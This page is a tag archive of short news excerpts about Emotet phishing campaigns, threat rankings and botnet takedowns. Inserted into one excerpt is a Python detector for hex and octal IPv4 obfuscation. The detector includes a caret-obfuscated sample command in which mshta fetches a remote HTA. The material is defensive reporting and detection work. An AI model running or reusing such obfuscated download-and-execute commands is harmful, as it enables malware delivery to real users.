Tag Archive for: Emotet

Emotet malware infects users again after fixing broken installer



The Emotet malware phishing campaign is up and running again after the threat actors fixed a bug preventing people from becoming infected when they opened malicious email attachments.

Emotet is a malware infection distributed through spam campaigns with malicious attachments. If a user opens the attachment, malicious macros or scripts will download the Emotet DLL and load it into memory.

Once loaded, the malware will search for and steal emails to use in future spam campaigns and drop additional payloads such as Cobalt Strike or other malware that commonly leads to ransomware attacks.

Buggy attachments broke the Emotet campaign

Last Friday, the Emotet malware distributors launched a new email campaign that included password-protected ZIP file attachments containing Windows LNK (shortcut) files pretending to be Word documents.

Current Emotet phishing email example
Source: Cofense

When a user double-clicked on the shortcut, it would execute a command that searches the shortcut file for a particular string that contains Visual Basic Script code, appends the found code to a new VBS file, and executes that VBS file, as shown below.

Emotet shortcut commands from Friday's campaign
Source: BleepingComputer

However, this command contained a bug as it used a static shortcut name of ‘Password2.doc.lnk,’ even though the actual name of the attached shortcut file is different, like ‘INVOICE 2022-04-22_1033, USA.doc’.

This caused the command to fail, as the Password2.doc.lnk file did not exist, and thus the VBS file was not created, as explained by the Emotet research group Cryptolaemus.

Cryptolaemus researcher Joseph Roosen told BleepingComputer that Emotet shut down the new email campaign at approximately 00:00 UTC on Friday after discovering that the bug was preventing users from becoming infected.

Unfortunately, Emotet fixed the bug today…

Source…

Lokibot Returns to the Index and Emotet Regains Top Spot


Check Point Research reveals that the InfoStealer, Lokibot, is back in the most prevalent malwares list while Emotet has taken first place away from Trickbot. Apache Log4j is still wreaking havoc as the number one most exploited vulnerability.

SAN CARLOS, Calif., Feb. 08, 2022 (GLOBE NEWSWIRE) — Check Point Research, the Threat Intelligence arm of Check Point® Software Technologies Ltd. (NASDAQ: CHKP), a leading provider of cyber security solutions globally, has published its latest Global Threat Index for January 2022. Researchers report that Emotet has now pushed Trickbot out of first place after a long stay at the top, and is this month’s most prevalent malware, affecting 6% of organizations worldwide. Log4j is also still proving to be a problem, impacting 47.4% of organizations globally and the most attacked industry continues to be Education/Research.

After only two and a half months since its return, Emotet has surged into the top spot. The notorious botnet is most commonly spread via phishing emails that contain malicious attachments or links. Its increased use has only been helped by the prevalence of Trickbot that acts as a catalyst, spreading the malware even further. Meanwhile Dridex has dropped from the top ten list altogether, replaced by Lokibot, an InfoStealer which is used to obtain data such as email credentials, passwords to CryptoCoin wallets and FTP servers.

“It’s unsurprising that Emotet is back with a vengeance. It’s an evasive malware, making it difficult to detect, while the fact that it uses multiple methods to infect networks only further adds to the continuing rise of this threat. It is unlikely that this will be a short-lived problem,” said Maya Horowitz, VP Research at Check Point Software. “This month we’ve also seen Dridex disappear from our top ten list and Lokibot resurface. Lokibot takes advantage of victims at their busiest moments, being distributed through well disguised phishing emails. These threats, alongside the ongoing battle with the Log4j vulnerability, emphasise the importance of having the best security across networks, cloud, mobile and user endpoints.”

Check Point Research (CPR) revealed this month that…

Source…

Trend Micro: Emotet Spam Abuses Unconventional IP Address Formats to Spread Malware


We observed Emotet spam campaigns using hexadecimal and octal representations of IP addresses, likely to evade detection via pattern matching. Both routines use social engineering techniques to trick users into enabling document macros and automate malware execution. When handed an address in either of these notations, the operating system (OS) automatically converts it to the dotted decimal quad form before initiating the request to the remote server. Users and businesses are advised to detect and block these formats and to enable the relevant security measures, since a compromise via Emotet leads to second-stage delivery of malware such as TrickBot and Cobalt Strike.

Routine using hexadecimal IP addresses

The samples we found start with an email-attached document using Excel 4.0 Macros, a dated feature used to automate repetitive tasks in Excel that malicious actors have abused to deliver malware. Abuse of the feature in this case allows the malware to execute once the document is opened using the auto_open macro.

Figure 1. Attached document in the emails lures users into enabling the macros

The URL is obfuscated with carets and the host contains a hexadecimal representation of the IP address. Using CyberChef, we converted the hexadecimal numbers to find the more commonly used dotted decimal equivalent, 193[.]42[.]36[.]245.

Figure 2. Using carets for obfuscation

Figure 3. Converting the hexadecimal numbers to dotted decimal representation

Once executed, the macro invokes cmd.exe > mshta.exe with the URL containing the hex representation of the IP address as an argument, which will download and execute an HTML application (HTA) code from the remote host.

Figure 4. Downloading and executing an HTA code

Routine using octal IP addresses

Much like the hexadecimal representation sample, the document also uses Excel 4.0 Macros to run the malware once the…
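As an added defender-side example (not Trend Micro's code), the following Python normalizes the hexadecimal, octal and mixed IPv4 spellings used by both routines above to dotted decimal, the same conversion the OS performs, and flags such hosts in a caret-escaped command line; the sample command line and the 203.0.113.10 address are constructed.

```python
import re
from typing import List, Optional, Tuple

# Part grammar follows the classic BSD inet_aton rules that Windows and most
# Unix resolvers apply: "0x" prefix = hexadecimal, leading "0" = octal, else
# decimal. One to four dot-separated parts; the last part fills all remaining
# bytes of the 32-bit address (so "0xC12A24F5" and "0301.052.044.0365" are
# both valid spellings of one address).
_PART = re.compile(r"^(0[xX][0-9a-fA-F]+|0[0-7]*|[1-9][0-9]*)$")
_URL_HOST = re.compile(r"https?://([^/\s:'\"]+)")

def _parse_part(part: str) -> Optional[int]:
    if not _PART.match(part):
        return None
    if part[:2].lower() == "0x":
        return int(part[2:], 16)
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)
    return int(part)

def normalize_ipv4(host: str) -> Optional[str]:
    """Dotted-decimal form of any inet_aton-style host string, or None."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = [_parse_part(p) for p in parts]
    if any(v is None for v in values):
        return None
    *lead, last = values
    # Leading parts are single octets; the last part spans the remaining bytes.
    if any(v > 0xFF for v in lead) or last >= 1 << (8 * (4 - len(lead))):
        return None
    num = last
    for i, v in enumerate(lead):
        num |= v << (8 * (3 - i))
    return ".".join(str((num >> s) & 0xFF) for s in (24, 16, 8, 0))

def is_unconventional(host: str) -> bool:
    """True when host is an IPv4 literal written in anything but dotted decimal."""
    canonical = normalize_ipv4(host)
    return canonical is not None and canonical != host

def flag_hosts(command_line: str) -> List[Tuple[str, str]]:
    """Return (host_as_seen, dotted_decimal) for every non-canonical IPv4 URL
    host in a command line, after undoing cmd.exe caret escaping."""
    plain = re.sub(r"\^(.)", r"\1", command_line)  # ^x -> x, ^^ -> ^
    return [(h, normalize_ipv4(h)) for h in _URL_HOST.findall(plain)
            if is_unconventional(h)]

# Constructed sample (RFC 5737 test address, not a real indicator).
SAMPLE = "cmd /c mshta h^t^tp://0xCB^00710A/index.hta"
print(flag_hosts(SAMPLE))  # [('0xCB00710A', '203.0.113.10')]
```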

Source…

Cyber Security Today, Dec. 8, 2021 – Microsoft, Google disrupt botnets and worrisome news about Emotet malware


Microsoft and Google disrupt botnets, worrisome news about Emotet malware, and more.

Welcome to Cyber Security Today. It’s Wednesday, December 8th. I’m Howard Solomon, contributing writer on cybersecurity for ITWorldCanada.com.


Some good news to tell you about:

Microsoft has disrupted the activities of a China-based hacking group. This comes after a U.S. court has allowed Microsoft to seize websites of the gang it calls Nickel. The sites were being used to attack organizations in 29 countries, including government agencies, think tanks and human rights organizations. This gang has been operating since 2016, sometimes by compromising a target organization’s VPN, stealing employee passwords by spear phishing or taking advantage of unpatched Microsoft Exchange and SharePoint servers.

Google said it has temporarily disrupted the command and control infrastructure behind a botnet of 1 million compromised Windows devices. It calls the botnet Glupteba. It’s been stealing victims’ passwords, hiding cryptocurrency miners on their computers and running other people’s internet traffic through their computers and routers. What makes this sophisticated botnet different from others is it defends itself with a blockchain-based system that retrieves backup domains through three bitcoin wallets. So Google is trying a long-shot: It’s suing two persons believed to be in Russia for operating the botnet in violation of U.S. law.

Sophisticated Russian-based threat actors allegedly associated with the Nobelium threat group, which was behind the SolarWinds Orion update compromise, have been spotted by researchers at Mandiant. In a report issued this week the company said it is seeing attacks against service providers to get into other organizations. In at least one instance a compromised VPN account was leveraged to get deeper into a company’s IT systems. In another case the attacker accessed the organization’s Microsoft 365 environment using a stolen digital session token. In some cases victims were hit after going to websites offering free or cracked software. Some victims who use smartphone-based multifactor authentication to protect their accounts were fooled by an attack that…

Source…